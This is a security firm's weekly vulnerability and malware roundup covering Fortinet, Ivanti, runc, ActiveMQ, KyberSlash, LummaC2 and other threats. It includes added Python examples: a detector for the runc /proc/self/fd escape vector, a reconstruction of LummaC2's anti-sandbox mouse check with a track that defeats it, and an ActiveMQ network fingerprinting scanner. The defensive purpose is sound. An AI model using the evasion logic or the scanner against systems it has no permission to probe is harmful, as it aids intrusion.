
WakeUp Wednesday

14 February 2024 | Category: Vulnerability

Welcome to #WakeUpWednesday. We want to make the Netherlands digitally safe and resilient. That is why Tesorion will now give you a short overview every Wednesday in a post about vulnerabilities or hacks that have received national or international attention. We want to wake up as many people as possible and make them aware of possible risks in the field of cyber security.

We will of course report directly on important vulnerabilities and options to mitigate them. Our #WakeUpWednesday is a kind of retrospective.


#WakeUpWednesday February 14, 2024

Fortinet recently published two advisories. The first describes CVE-2024-21762, an out-of-bounds write in the FortiOS SSL VPN daemon that allows an unauthenticated, remote attacker to execute arbitrary code via specifically crafted requests. The second describes CVE-2024-23113, a format string vulnerability in the FortiOS FortiGate-to-FortiManager (FGFM) daemon that could likewise allow an unauthenticated, remote attacker to execute arbitrary code or commands via specially crafted requests. Both are rated critical (CVSS 9.6 and 9.8 respectively in Fortinet's advisories), and Fortinet reports that CVE-2024-21762 is potentially being exploited in the wild. No public exploit code is currently available for either vulnerability. Where patching has to wait, Fortinet's workarounds are to disable SSL VPN entirely (disabling web mode alone is not a valid workaround) and to remove fgfm from the allowed access list of every interface. More information is available via the blog.

Ivanti has disclosed a new vulnerability that affects Connect Secure, Policy Secure and ZTA gateways. This vulnerability, CVE-2024-22024, is an XML external entity (XXE) flaw in the SAML component with a CVSS score of 8.3; it allows attackers to access restricted resources without authentication. There is no indication that it is currently being exploited, unlike the previously published vulnerabilities CVE-2023-46805, CVE-2024-21887 and CVE-2024-21893. The mitigation released on January 31 also protects against CVE-2024-22024, and patches are now available. We recommend installing these patches as soon as possible.

New macOS malware written in Rust is currently being distributed, posing as a Visual Studio update. The malware, called RustDoor, provides a backdoor into affected systems. RustDoor runs on both Intel-based (x86_64) and ARM (Apple Silicon) Macs, according to researchers at cybersecurity firm Bitdefender. The backdoor is offered under various names, including ‘zshrc2,’ ‘Previewers,’ ‘VisualStudioUpdater,’ ‘VisualStudioUpdater_Patch,’ ‘VisualStudioUpdating,’ ‘visualstudioupdate,’ and ‘DO_NOT_RUN_ChromeUpdates’. It supports a wide range of commands, among other things to upload files, collect files and gather information about the endpoint.

#WakeUpWednesday February 7, 2024

We start this WakeUp Wednesday with the attack on software company AnyDesk. AnyDesk, maker of remote desktop software, indicates that a security audit revealed that production systems had been compromised. All security-related certificates have been revoked and the systems have been repaired or replaced where necessary. The code signing certificate for the binaries will also soon be revoked and replaced by a new one. As a precaution, the passwords for the web portal have been reset, and users are asked to change their password anywhere else they reused it.

Snyk researchers have discovered four critical vulnerabilities in container engine components. These four vulnerabilities (CVE-2024-21626, CVE-2024-23651, CVE-2024-23653 and CVE-2024-23652) are collectively called ‘Leaky Vessels’. The one requiring the most urgent attention is CVE-2024-21626, with a CVSS score of 8.6. It affects runC, the lightweight container runtime used by Docker and many other container environments. The flaw is a file descriptor leak: runc leaves a handle to a host directory open while setting up the container, so a container whose working directory is set to a path under /proc/self/fd/ starts with a foothold in the host filesystem. Exploiting it could allow an attacker to gain unauthorized access to the underlying host operating system and potentially to anything else running on the same host. runc (1.1.12), BuildKit (0.12.5) and Docker Engine (25.0.2) have released updates that fix the vulnerabilities. CISA encourages cloud system administrators to take appropriate measures quickly to prevent exploitation.
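Two checks a practitioner would want after reading the Leaky Vessels paragraph, as an added example (this is not Snyk's, runc's or Tesorion's code): a version comparison against the first fixed runc release, and a scan for the documented vector, a working directory set to a path under /proc/<pid>/fd/, in both Dockerfiles and OCI runtime config.json files. The fixed version 1.1.12 is from the runc advisory; the sample inputs are constructed, and the assumption that no legitimate image ever sets its working directory under /proc/<pid>/fd/ is mine.

```python
import json
import re
from typing import List, Optional, Tuple

RUNC_FIXED = (1, 1, 12)   # first runc release with the fix for CVE-2024-21626
_FD_PATH = re.compile(r"^/proc/(self|\d+)/fd(/|$)")
_VERSION = re.compile(r"(\d+)\.(\d+)\.(\d+)")


def parse_version(text: str) -> Tuple[int, int, int]:
    """First x.y.z triple in 'runc --version' output; pre-release suffixes are ignored."""
    m = _VERSION.search(text)
    if not m:
        raise ValueError(f"no version number in {text!r}")
    major, minor, patch = (int(x) for x in m.groups())
    return major, minor, patch


def runc_is_vulnerable(version_output: str) -> bool:
    """True when the reported runc release predates 1.1.12."""
    return parse_version(version_output) < RUNC_FIXED


def suspicious_workdirs(dockerfile: str) -> List[str]:
    """WORKDIR instructions whose path resolves through /proc/<pid>/fd/.

    A build that sets its working directory there can only be trying to reach
    a descriptor leaked by the runtime (assumption: legitimate images never need it).
    """
    hits: List[str] = []
    for raw in dockerfile.splitlines():
        line = raw.strip()
        parts = line.split(None, 1)
        if len(parts) != 2 or parts[0].upper() != "WORKDIR":
            continue
        path = parts[1].strip().strip('"')
        if _FD_PATH.match(path):
            hits.append(line)
    return hits


def suspicious_cwd(oci_config_json: str) -> Optional[str]:
    """process.cwd from an OCI runtime config.json if it points into /proc/<pid>/fd/.

    This covers 'docker run -w ...' and a Kubernetes container workingDir as well
    as a Dockerfile, because all of them end up in the runtime spec.
    """
    cwd = json.loads(oci_config_json).get("process", {}).get("cwd", "")
    return cwd if isinstance(cwd, str) and _FD_PATH.match(cwd) else None


# Constructed sample inputs, not taken from a real build or incident.
SAMPLE_RUNC_VERSION = "runc version 1.1.11\nspec: 1.0.2-dev\n"
SAMPLE_DOCKERFILE = """\
FROM alpine:3.19
WORKDIR /app
COPY . .
WORKDIR /proc/self/fd/7
CMD ["sh"]
"""
SAMPLE_OCI_CONFIG = json.dumps({
    "ociVersion": "1.0.2",
    "process": {"cwd": "/proc/self/fd/7", "args": ["sh"]},
})

if __name__ == "__main__":
    print("runc vulnerable :", runc_is_vulnerable(SAMPLE_RUNC_VERSION))
    print("Dockerfile hits :", suspicious_workdirs(SAMPLE_DOCKERFILE))
    print("OCI cwd hit     :", suspicious_cwd(SAMPLE_OCI_CONFIG))
```

Run the version check against `runc --version` on every node, and the two path checks in CI over Dockerfiles and over the config.json files a runtime writes under its bundle directory; a hit in either is a reason to block the build or the pod, whether or not the node has already been patched.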

A critical vulnerability in the social media network Mastodon allows Mastodon accounts to be taken over remotely. The vulnerability, CVE-2024-23832, has a CVSS score of 9.4. A security update has now been released to resolve the vulnerability. Technical details about the vulnerability will be released on February 15. This gives administrators the opportunity to install the available update before the details are known and the risk of exploitation increases.

#WakeUpWednesday January 31, 2024

Cisco has announced that its Unified Communications and Contact Center Solutions products are vulnerable to a critical vulnerability (CVE-2024-20253). This vulnerability allows an attacker to remotely execute code and gain root access to the affected device. The vulnerability has a CVSS score of 9.9. We recommend installing the available patches as soon as possible.

Fortinet researchers have discovered new malicious packages in the open-source Python Package Index (PyPI). The packages infect Windows systems with an infostealer called WhiteSnake Stealer. They are named nigpal, telerer, seGMM, myGens, NewGends and TestLibs111. The malicious code runs when the package is installed, with behaviour that depends on the operating system of the victim's device.

Two weeks ago, our WakeUp Wednesday covered two critical vulnerabilities in GitLab (CVE-2023-7028) and (CVE-2023-5356). GitLab is now once again warning of a vulnerability (CVE-2024-0402) that could allow an authenticated attacker to write files to arbitrary locations on the GitLab server when creating a workspace. The vulnerability has a CVSS score of 9.9 and is fixed in GitLab 16.6.6, 16.7.4, and 16.8.1. In addition, the solution has also been implemented in version 16.5.8. We recommend installing the update as soon as possible.

Finally, the AIVD warns against the use of Quantum Key Distribution (QKD). According to the AIVD, this method of exchanging encryption keys offers no guarantee in practice that the quantum channels cannot be eavesdropped on or manipulated by third parties, and the technology is unusable in most cases because of its practical limitations. For example, special hardware is required, and the range is limited because QKD systems need a direct fiber optic connection or line-of-sight light signals; it is therefore no greater than a few hundred kilometers.

#WakeUpWednesday January 24, 2024

An increase in attacks has been noted that exploit the Ivanti Connect Secure and Ivanti Policy Secure vulnerabilities. These vulnerabilities allow attackers to gain access to sensitive information and systems. The latest information regarding these vulnerabilities (CVE-2023-46805 and CVE-2024-21887) can be found in our blog. There are currently no security updates available, but it is possible to take mitigating measures to reduce the risk. Our blog also includes Ivanti’s schedule for releasing the security updates.

Another serious threat is the Apache ActiveMQ vulnerability CVE-2023-46604, which is being actively exploited by several cybercriminal groups. The vulnerability allows remote code execution. Since it was disclosed, it has been abused by multiple malicious actors to deploy ransomware, rootkits, cryptocurrency miners and DDoS botnets. Researchers at Trustwave have seen a new Godzilla web shell that disguises itself as an unknown binary format and thus evades detection by security solutions. A patch is available for CVE-2023-46604; we recommend installing it as soon as possible.

Finally, a warning about an old, but still effective attack technique: abusing TeamViewer to spread ransomware. According to a report from Huntress, it appears that ransomware groups are still using this method to gain access to devices and then deliver their malicious payload. In many cases, this abuse can be prevented by using strong passwords, enabling multi-factor authentication and using TeamViewer only where and when necessary.

#WakeUpWednesday January 17, 2024

Ivanti Connect Secure VPN contains two vulnerabilities that together pose a serious threat to the security of the system. The first vulnerability (CVE-2023-46805) allows authentication to be bypassed and access to the system without valid credentials. The second vulnerability (CVE-2024-21887) allows commands to be injected and executed on the system. An attacker can manipulate or take over the system’s configuration, files and network connections. It is therefore important to install available updates or restrict access to the system as soon as possible.

Juniper Networks SRX series firewalls and EX series switches have a critical vulnerability (CVE-2024-21591) in the J-Web configuration interface. The vulnerability has a CVSS score of 9.8 and allows remote code execution on the devices without authentication. An attacker can gain root privileges, disable the device, or cause a Denial of Service (DoS). It is highly recommended to install the security updates or upgrade Junos OS to the latest version. If that is not possible, as a workaround one can disable J-Web or limit access to it to trusted network hosts only.

GitLab Community and Enterprise have two critical vulnerabilities that allow account hijacking. The first vulnerability (CVE-2023-7028) has a CVSS score of 10 and allows account takeover without user interaction. The second vulnerability (CVE-2023-5356) has a CVSS score of 9.6 and allows exploiting Slack/Mattermost integrations to execute slash commands as a different user. It is recommended to install the updates as soon as possible.

#WakeUpWednesday January 10, 2024

A new remote code execution vulnerability has been discovered in the Apache RocketMQ NameServer, which was not resolved by the previous patch. This vulnerability, CVE-2023-37582, allows attackers to execute arbitrary code on affected servers. The recommended solution is to upgrade the NameServer to version 5.1.2 or 4.9.7.

Three malicious Python packages have been found in the open-source Python Package Index (PyPI) repository that install crypto miners on Linux devices. According to research by Fortinet, the packages, modularseven, driftme and catme, are related to an earlier campaign that used the culturestreak package. The packages have since been removed from PyPI.

Multiple implementations of the Kyber key encapsulation mechanism for quantum-safe encryption are vulnerable to a series of flaws collectively called KyberSlash. The reference code divides by the modulus q during decapsulation, in the message decoding (KyberSlash1) and in the compression functions (KyberSlash2); on many CPUs the division instruction's latency depends on its operands, so the timing leaks information derived from the secret key and can allow recovery of that key. Kyber is one of the algorithms selected by NIST (National Institute of Standards and Technology) to resist attacks from quantum computers.
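The fix adopted upstream replaces each secret-dependent division by a multiply-and-shift that rounds the same way, and the check a reviewer wants before trusting such a rewrite is an exhaustive comparison over the whole coefficient range. The following is an added example, not the Kyber reference code: it reproduces the division form and the branch-free form for the message bit and for 4-bit compression, using the modulus 3329 and the constants 1665, 80635 and 28 from the public fix, and compares them for every coefficient value. Timing behaviour itself is not something Python can demonstrate; the point here is the equivalence argument.

```python
KYBER_Q = 3329  # Kyber modulus; the message bit and compression round against it


def tomsg_bit_division(t: int) -> int:
    """Message bit from a coefficient t in [0, q), as in poly_tomsg before the fix.

    The '// KYBER_Q' compiles to an integer division whose latency on many CPUs
    depends on the operands, and t is derived from the secret key.
    """
    return (((t << 1) + KYBER_Q // 2) // KYBER_Q) & 1


def tomsg_bit_constant_time(t: int) -> int:
    """The same rounding as multiply-and-shift, which runs in data-independent time."""
    t <<= 1
    t += 1665
    t *= 80635
    t >>= 28
    return t & 1


def compress4_division(t: int) -> int:
    """4-bit coefficient compression (the 128-byte poly_compress variant) before the fix."""
    return (((t << 4) + KYBER_Q // 2) // KYBER_Q) & 0xF


def compress4_constant_time(t: int) -> int:
    """Division-free replacement with the same constants; the wider input range
    still keeps the rounding error below one unit of 1/q."""
    d = t << 4
    d += 1665
    d *= 80635
    d >>= 28
    return d & 0xF


def equivalent_on_full_domain() -> bool:
    """Exhaustive check: both rewrites agree with the division form for all t in [0, q)."""
    return all(
        tomsg_bit_division(t) == tomsg_bit_constant_time(t)
        and compress4_division(t) == compress4_constant_time(t)
        for t in range(KYBER_Q)
    )


if __name__ == "__main__":
    print("rewrites equivalent on [0, q):", equivalent_on_full_domain())
    # Message-bit boundaries: coefficients near q/4 and 3q/4 flip the bit.
    for t in (832, 833, 2496, 2497):
        print(t, tomsg_bit_division(t), tomsg_bit_constant_time(t))
```

Why 1665 rather than q/2 = 1664: the multiplier 80635/2^28 is slightly smaller than 1/q, so the product always falls just short of the true quotient; adding one to the rounding offset moves the exact multiples of q back onto the correct side, and the exhaustive loop is what proves no other input is affected.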

Ivanti has released an update to address a remote code execution vulnerability in its Endpoint Manager (EPM) software. The vulnerability, registered as CVE-2023-39336, is a SQL injection that could allow attackers to gain control of managed devices or of the server itself. It affects all supported Ivanti EPM versions. A patch is available.

#WakeUpWednesday December 20, 2023

Akamai recently released more information about the zero-click Outlook vulnerabilities CVE-2023-35384 and CVE-2023-36710. When chained, these vulnerabilities let cybercriminals remotely execute code in the Outlook client without any user action. Patches are available for both.

Lumen Technologies’ Black Lotus Labs team has discovered a new botnet called KV-botnet. This botnet abuses SOHO (Small Office/Home Office) routers, firewalls and VPN equipment from Cisco, DrayTek, Fortinet and NETGEAR. KV-botnet focuses on equipment at the edge of the network, such as that of home workers, because such devices are often a weak link in the cybersecurity of organizations.

Researchers from ESET published a report this week on 116 malware packages found in the Python Package Index (PyPI) Repositories. These malware packages aim to infect Windows and Linux systems with a backdoor. In some cases, the final payload is a variant of the infostealer W4SP Stealer or a simple clipboard monitor to steal cryptocurrency, or both. It is estimated that these packages have been downloaded more than 10,000 times since May 2023.

#WakeUpWednesday December 13, 2023

The Vrije Universiteit Amsterdam has unveiled a new side-channel attack method: SLAM. SLAM allows attackers to steal sensitive information from the kernel memory of operating systems running on Intel, AMD or Arm CPUs. SLAM is a Spectre-like attack that takes advantage of a new feature in Intel CPUs: Linear Address Masking (LAM). AMD and Arm have similar features: Upper Address Ignore (UAI) and Top Byte Ignore (TBI). LAM is intended to improve security by making pointer tagging cheaper, but it also introduces new weaknesses: it increases the Spectre attack surface. The following CPUs are vulnerable:

  • Existing AMD CPUs (registered as CVE-2020-12965)
  • Future Intel CPUs with LAM (both 4 and 5 level paging)
  • Future AMD CPUs with UAI and 5-level paging
  • Future Arm CPUs with TBI and 5-level paging

Researchers at Elastic Security Labs have discovered that a new functionality has been added to GuLoader malware to make analysis by researchers even more difficult. The Malware-as-a-Service (MaaS) still works the same, but is more difficult to analyze. GuLoader spreads through phishing campaigns. The emails contain a ZIP file or a link to a Visual Basic Script.

Cybercriminals can connect a keyboard to Android, Linux, macOS and iOS devices without permission by exploiting a vulnerability in Bluetooth (CVE-2023-45866). They use an authentication bypass to pair with vulnerable devices; several Bluetooth stacks are affected. An attacker within Bluetooth range can thus inject keystrokes without the user’s consent. The attack also works in Apple’s Lockdown Mode, which is intended to protect against advanced digital threats. The preconditions differ per platform: Android devices are affected whenever Bluetooth is on, Linux (BlueZ) hosts when they are discoverable and connectable, and macOS and iOS devices when Bluetooth is on and a Magic Keyboard has been paired with them.

#WakeUpWednesday December 6, 2023

Zyxel released updates last week to patch 15 vulnerabilities in its NAS, Firewall and Access points. Three critical vulnerabilities can lead to an authentication bypass and the ability for a cybercriminal to execute certain operating system commands. In addition, updates have been released for vulnerabilities that could allow a cybercriminal to access system information and execute arbitrary commands.

MalwareHunterTeam reports having discovered one of the most advanced versions of Qilin Ransomware. Unlike many other ransomware groups, Qilin does not use leaked Babuk source code. They build their own encryptors aimed at Linux servers. This new version offers far-reaching options for customizing Linux encryptors. Qilin’s encryptor is built with built-in configuration rules. For example, these specify the extension for encrypted files, the processes to terminate, the files to encrypt or exclude, and the directories to encrypt or exclude. However, it also contains numerous command line arguments that allow extensive customization of these configuration options and the way files are encrypted on a server.

Critical vulnerabilities in the data analytics solution Qlik Sense (CVE-2023-41265, CVE-2023-41266 and CVE-2023-48365) are currently being exploited by the Cactus ransomware group. Updates are available for these vulnerabilities. Researchers at Arctic Wolf warn that these previously published vulnerabilities are now being actively exploited by cybercriminals. The attackers use PowerShell and the Background Intelligent Transfer Service (BITS) to download tools and establish remote access to the machine.

#WakeUpWednesday November 29, 2023

ownCloud’s maintainers warn of three critical vulnerabilities (CVE-2023-49103, CVE-2023-49104 and CVE-2023-49105). ownCloud is an open-source file sharing solution. The vulnerabilities can be exploited to disclose sensitive information and to access or modify files without valid credentials. One of them, in the graphapi app, can reveal the administrator password, mail server credentials and license key. Mitigation measures are described in the blog. In addition, it is recommended to update the affected apps and libraries as soon as possible.

ESET research has revealed more details about a rogue Telegram bot called Telekopye. Telekopye can create phishing websites, emails, and text messages, among other things. The actors behind this operation have been given the name Neanderthals. The operation focuses on three types of scams. Selling non-existent goods, tricking people into entering financial details remotely and thus cheating them out of money and refund scams.

Email messages themed around the delivery or shipping of goods are currently being used to distribute WailingCrab malware. This malware is split into several components, including a loader, an injector and a backdoor, according to research by IBM X-Force. WailingCrab is also known as WikiLoader. The malware is actively maintained and includes functionality to hinder analysis and detection. One of the ways this is done is by using legitimate, compromised websites for the initial command-and-control (C2) communication. In addition, parts of the malware are hosted on well-known platforms such as Discord.

Play ransomware is currently also offered as ‘Ransomware-as-a-Service’, according to research by Adlumin. They come to this conclusion after analyzing various Play ransomware attacks on organizations in different sectors. Almost identical tactics were used and applied in the same order. There is a lack of even the slightest variations between attacks. For example, the public music folder is used to hide the malicious file and the same password is used to create high-privilege accounts.

#WakeUpWednesday November 22, 2023

The FBI has published an advisory explaining the methods of Scattered Spider, a hacker group that collaborates with the ransomware group ALPHV/BlackCat. Scattered Spider uses phishing, MFA (multi-factor authentication) push bombing and SIM swapping to gain access to the networks of large organizations. A recent report from Microsoft, which refers to this group as Octo Tempest, calls them one of the most dangerous financially motivated groups, one that does not shy away from violent threats to achieve its goals.

A proof of concept exploit has been released for a critical vulnerability in CrushFTP enterprise suite (CVE-2023-43177). An update is available, but there are currently still 10,000 CrushFTP instances that are publicly accessible. Unfortunately, the update does not address all possible threats, so additional measures are recommended.

Outpost24 has discovered that LummaC2, an infostealer, has gained new capabilities to avoid detection. For example, LummaC2 v4.0 is packed with a crypter to prevent the raw form of the infostealer from being leaked. In addition, the infostealer uses trigonometry to tell a human operator from an analysis sandbox: it samples the cursor position several times over a short interval, turns the samples into movement vectors and measures the angle between consecutive vectors, and only continues when the movement is smooth enough to be a hand on a mouse. Most analysis systems cannot realistically emulate mouse movements, which makes detection more difficult.
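The check as Outpost24 describes it, reconstructed here as an added example rather than taken from the LummaC2 sample: consecutive cursor samples become displacement vectors, the angle between each pair of consecutive vectors is computed, and the track is accepted as human only if every angle stays below 45 degrees (the reported threshold). The number of samples, the treatment of a cursor that does not move, and the Bezier curve that a sandbox's mouse emulator could replay to pass the check are my assumptions; the cursor tracks are constructed.

```python
import math
from typing import List, Optional, Sequence, Tuple

Point = Tuple[float, float]

# 45 degrees is the threshold Outpost24 reports for LummaC2 v4.0; everything else is parameterised.
ANGLE_THRESHOLD_DEG = 45.0


def turning_angles(points: Sequence[Point]) -> Optional[List[float]]:
    """Angles in degrees between consecutive displacement vectors of a cursor track.

    Returns None when the cursor did not move between two samples: the angle is
    undefined then, and a cursor that never moves is exactly what a bare sandbox
    shows, so the caller treats it as 'not human' (my choice, not documented behaviour).
    """
    vectors = [(b[0] - a[0], b[1] - a[1]) for a, b in zip(points, points[1:])]
    angles: List[float] = []
    for (x1, y1), (x2, y2) in zip(vectors, vectors[1:]):
        n1, n2 = math.hypot(x1, y1), math.hypot(x2, y2)
        if n1 == 0.0 or n2 == 0.0:
            return None
        cos = (x1 * x2 + y1 * y2) / (n1 * n2)
        cos = max(-1.0, min(1.0, cos))          # guard acos against rounding drift
        angles.append(math.degrees(math.acos(cos)))
    return angles


def looks_human(points: Sequence[Point], threshold_deg: float = ANGLE_THRESHOLD_DEG) -> bool:
    """The gate as described: every turn between consecutive samples must stay below the threshold."""
    if len(points) < 3:
        return False
    angles = turning_angles(points)
    return angles is not None and all(a < threshold_deg for a in angles)


def bezier_path(p0: Point, p1: Point, p2: Point, samples: int = 5) -> List[Point]:
    """Points on a quadratic Bezier curve: the kind of track a sandbox mouse emulator
    can replay so that the check above passes, instead of random jumps or no movement."""
    out: List[Point] = []
    for i in range(samples):
        s = i / (samples - 1)
        x = (1 - s) ** 2 * p0[0] + 2 * (1 - s) * s * p1[0] + s ** 2 * p2[0]
        y = (1 - s) ** 2 * p0[1] + 2 * (1 - s) * s * p1[1] + s ** 2 * p2[1]
        out.append((x, y))
    return out


# Constructed cursor tracks (five samples, as if taken 50 ms apart); not recorded from a real host.
HUMAN_TRACK: List[Point] = [(100, 100), (112, 104), (125, 110), (139, 117), (154, 125)]
RANDOM_JUMPS: List[Point] = [(100, 100), (400, 50), (120, 300), (380, 290), (90, 60)]
IDLE_TRACK: List[Point] = [(200, 200)] * 5

if __name__ == "__main__":
    tracks = [("smooth", HUMAN_TRACK), ("random", RANDOM_JUMPS), ("idle", IDLE_TRACK),
              ("bezier", bezier_path((0, 0), (50, 80), (200, 100)))]
    for name, track in tracks:
        print(f"{name:7s} angles={turning_angles(track)} human={looks_human(track)}")
```

The lesson for detonation environments is in the last two tracks: an idle cursor and randomly teleporting coordinates both fail the gate, while a smooth interpolated path passes it, so a sandbox that wants this family to detonate needs a mouse emulator that produces continuous, gently curving motion during the first seconds of execution.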

#WakeUpWednesday November 15, 2023

Cybercriminals regularly use social engineering in the preparation phase of an attack. The FBI recently published advice to give organizations tools to prevent ‘callback phishing’. In this form of phishing, the victim receives an email about problems with their account. The email contains a telephone number to call to resolve the problems. Once the victim calls the number, they are talked through installing a legitimate remote management tool. Through that tool, the cybercriminals then install other tools to steal data, which is subsequently used to extort the organization.

Security researchers from BlackBerry have discovered a Windows variant of the BiBi-Linux Wiper. This wiper malware, called BiBi-Windows Wiper, overwrites the data in the Windows users directory with worthless data and appends .BiBi to the files. In addition to making the files unusable, the wiper removes shadow copies from the system. This makes the damage irreparable. It is not yet known how this BiBi-Windows Wiper is distributed. Currently, the campaign appears to be targeting Israel’s IT and government sectors. However, the groups associated with this wiper have historically attacked different sectors and different geographical locations.

Malwarebytes has discovered a new malvertising campaign that poses as a legitimate Windows news portal to distribute a malicious installer, in this case for the popular system profiling tool CPU-Z. Other utilities, such as Notepad++, Citrix and VNC Viewer, are abused in the same way. The malicious installer contains a PowerShell script and a loader called FakeBat, which is used to deploy RedLine Stealer.

#WakeUpWednesday November 8, 2023

For users of Apple devices, the ‘Find My’ function can be useful. Lost or stolen iPhones, iPads, Macs, Apple Watches, AirPods and AirTags can be located this way. Lost devices constantly send Bluetooth signals that are picked up by nearby Apple devices, which then anonymously report the location to the owner via the ‘Find My’ network. This works even when the lost device is offline. On the downside, Apple’s ‘Find My’ location network can also be abused by malicious actors to surreptitiously transmit sensitive information captured by keyloggers.

The keylogger does not need to use an AirTag or an officially supported chip because Apple devices are configured to respond to any Bluetooth message. If that message is in the correct format, the receiving Apple device creates a location report and uploads it to the ‘Find My’ network. On the German-language site Heise.de, Positive Security analysts have posted Proof-Of-Concept hardware to illustrate the risk of this functionality.

Atlassian indicates that a public exploit is now available for a critical Confluence vulnerability. This can be used in attacks that aim to destroy data. The attacks target Internet-exposed and unpatched environments. The critical vulnerability, CVE-2023-22518, is a vulnerability that affects all versions of Confluence Data Center and Confluence Server software. There are still no reports of active exploitation. Still, it’s important for administrators to take immediate action to protect the environments in use.

HelloKitty is a ransomware operation whose source code was recently leaked on a Russian-speaking cybercrime forum, making it available to everyone. The HelloKitty ransomware uses a recently disclosed remote code execution (RCE) vulnerability in Apache ActiveMQ, CVE-2023-46604, to enter organizations and encrypt data. By exploiting this vulnerability, attackers can execute arbitrary shell commands. The vulnerability was addressed in a security update on October 25, 2023. However, the threat monitoring service ShadowServer reports that as of October 30 there were still 3,329 Internet-exposed servers running a vulnerable version.
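The ShadowServer figure above is produced by fingerprinting exposed brokers, and the same check is worth running against your own estate for both ActiveMQ items on this page (this one and the January 24 entry). The following is an added example, not Apache's, Trustwave's or Tesorion's code: an ActiveMQ broker announces itself with an OpenWire WireFormatInfo frame as soon as a client connects to the OpenWire port (61616 by default), and that frame carries a properties map containing a ‘ProviderVersion’ string. The assumption here, based on OpenWire's loose encoding of that map, is that the key is followed by a one-byte type tag 0x09 (string) and a big-endian two-byte length; the sample frame is constructed, not a capture. The fixed releases, 5.15.16, 5.16.7, 5.17.6 and 5.18.3, are from the Apache advisory.

```python
import re
import socket
import struct
from typing import Optional, Tuple

# First fixed release per supported branch, from the Apache advisory for CVE-2023-46604.
FIXED_BY_BRANCH = {
    (5, 15): (5, 15, 16),
    (5, 16): (5, 16, 7),
    (5, 17): (5, 17, 6),
    (5, 18): (5, 18, 3),
}
_KEY = b"ProviderVersion"
_STRING_TYPE = 0x09   # OpenWire PrimitiveMap tag for a string value (assumed layout, see above)


def extract_provider_version(frame: bytes) -> Optional[str]:
    """Pull the 'ProviderVersion' string out of a WireFormatInfo frame, or None if absent/malformed."""
    i = frame.find(_KEY)
    if i < 0:
        return None
    pos = i + len(_KEY)
    if pos + 3 > len(frame) or frame[pos] != _STRING_TYPE:
        return None
    (length,) = struct.unpack(">H", frame[pos + 1:pos + 3])
    value = frame[pos + 3:pos + 3 + length]
    if len(value) != length:
        return None
    return value.decode("utf-8", errors="replace")


def parse_version(text: str) -> Tuple[int, int, int]:
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"no x.y.z version in {text!r}")
    major, minor, patch = (int(x) for x in m.groups())
    return major, minor, patch


def activemq_is_vulnerable(version: str) -> bool:
    """True when the reported release predates the fix for its branch."""
    major, minor, patch = parse_version(version)
    branch = (major, minor)
    if branch < (5, 15):
        return True                 # end-of-life branches never received the fix
    fixed = FIXED_BY_BRANCH.get(branch)
    if fixed is None:
        return False                # 5.19+ and 6.x were released after the fix
    return (major, minor, patch) < fixed


def fingerprint(host: str, port: int = 61616, timeout: float = 5.0) -> Optional[str]:
    """Network variant: connect, read the broker's greeting and return its version."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        return extract_provider_version(sock.recv(4096))


def _utf(s: str) -> bytes:
    """Java-style writeUTF for ASCII: big-endian 16-bit length followed by the bytes."""
    data = s.encode("utf-8")
    return struct.pack(">H", len(data)) + data


# Constructed stand-in for a broker greeting, not a capture: frame length, command type 0x01,
# the 'ActiveMQ' magic, a wire-format version, then a few properties-map entries.
SAMPLE_FRAME = (
    b"\x00\x00\x00\x60\x01ActiveMQ\x00\x00\x00\x0c\x01\x00\x00\x00\x40"
    + _utf("TcpNoDelayEnabled") + b"\x01\x01"
    + _utf("ProviderVersion") + bytes([_STRING_TYPE]) + _utf("5.18.2")
    + _utf("ProviderName") + bytes([_STRING_TYPE]) + _utf("ActiveMQ")
)

if __name__ == "__main__":
    v = extract_provider_version(SAMPLE_FRAME)
    print(v, "vulnerable" if v and activemq_is_vulnerable(v) else "fixed")
```

Point `fingerprint()` at every broker you own, from the Internet-facing side as well as internally; a broker that does not answer with a parseable version should be treated as vulnerable until confirmed otherwise, and a broker that was exposed while vulnerable deserves a forensic look at its logs and its JVM's loaded classes regardless of what the banner says now.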

Kinsing has a rich history of attacking container environments, often using misconfigured open Docker daemon API ports. Recently, research from cloud security firm Aqua has revealed that threat actors linked to Kinsing are attempting to exploit the recently disclosed Linux privilege escalation flaw called Looney Tunables. This, as part of a “new experimental campaign” designed to enter cloud environments. The development marks the first publicly documented case of active exploitation of Looney Tunables (CVE-2023-4911), which could allow a threat actor to gain root privileges.

#WakeUpWednesday November 1, 2023

The NGINX Ingress Controller for Kubernetes (ingress-nginx) contains three high-severity vulnerabilities (CVE-2022-4886, CVE-2023-5043 and CVE-2023-5044) that could be exploited by an attacker who is allowed to create or modify Ingress objects. Through the Ingress configuration, such an attacker can inject arbitrary code into the ingress controller process and steal credentials from the cluster, and thereby gain unauthorized access to sensitive data. No patch was available at the time of writing. The developers recommend enabling the “strict-validate-path-type” option and setting the “--enable-annotation-validation” flag, which rejects Ingress objects containing invalid characters and enforces additional restrictions. Updating ingress-nginx to version 1.19, together with the “--enable-annotation-validation” command line option, resolves two of the vulnerabilities, CVE-2023-5043 and CVE-2023-5044.

Microsoft has noticed that members of the Scattered Spider group are posing as newly hired employees at specific organizations. Through these social engineering-based attacks on support and help desk personnel, cybercriminals attempt to gain initial access to privileged accounts. This includes tricking helpdesk staff into resetting the victim’s password and multi-factor authentication (MFA) methods. Scattered Spider is known as an organization with great operational flexibility and uses tactics such as SMS phishing, SIM swapping and helpdesk fraud.

A new ransomware-as-a-service has been discovered under the name Hunters International. The discovery was made by malware analyst rivitna, who found the new encryptor. The encryptor shares multiple pieces of code with the Hive ransomware operation, which supports the assumption that the old gang has resumed its activities under a different banner. This is further substantiated by the fact that the Hunters International sample matched Hive ransomware version 6.

F5 warns customers of a critical vulnerability (CVE-2023-46747) impacting BIG-IP. Exploitation could allow an unauthenticated attacker with network access to the BIG-IP system via the management port and/or self IP addresses to execute arbitrary system commands. Only devices whose Traffic Management User Interface (TMUI) is reachable can be exploited, and the flaw does not affect the data plane. However, because the TMUI is often exposed internally, an attacker who has already compromised a network can exploit it. An update is available. If updating is not possible, mitigating measures can be taken.

#WakeUpWednesday October 25, 2023

On October 17, cybersecurity company Mandiant published a blog describing exploitation of vulnerability CVE-2023-4966. This is a critical vulnerability in Citrix ADC and Citrix Gateway. Furthermore, they reveal that session information of active users is leaked when exploiting the vulnerability. This gives an attacker the opportunity to take over sessions. In addition, an attacker can collect additional credentials. More information in our blog.

Researchers have found three critical vulnerabilities in SolarWinds Access Rights Manager (ARM) that allow cybercriminals to execute code with SYSTEM privileges. ARM is a tool that allows organizations to manage and audit user rights within their IT environment. A patch is available.

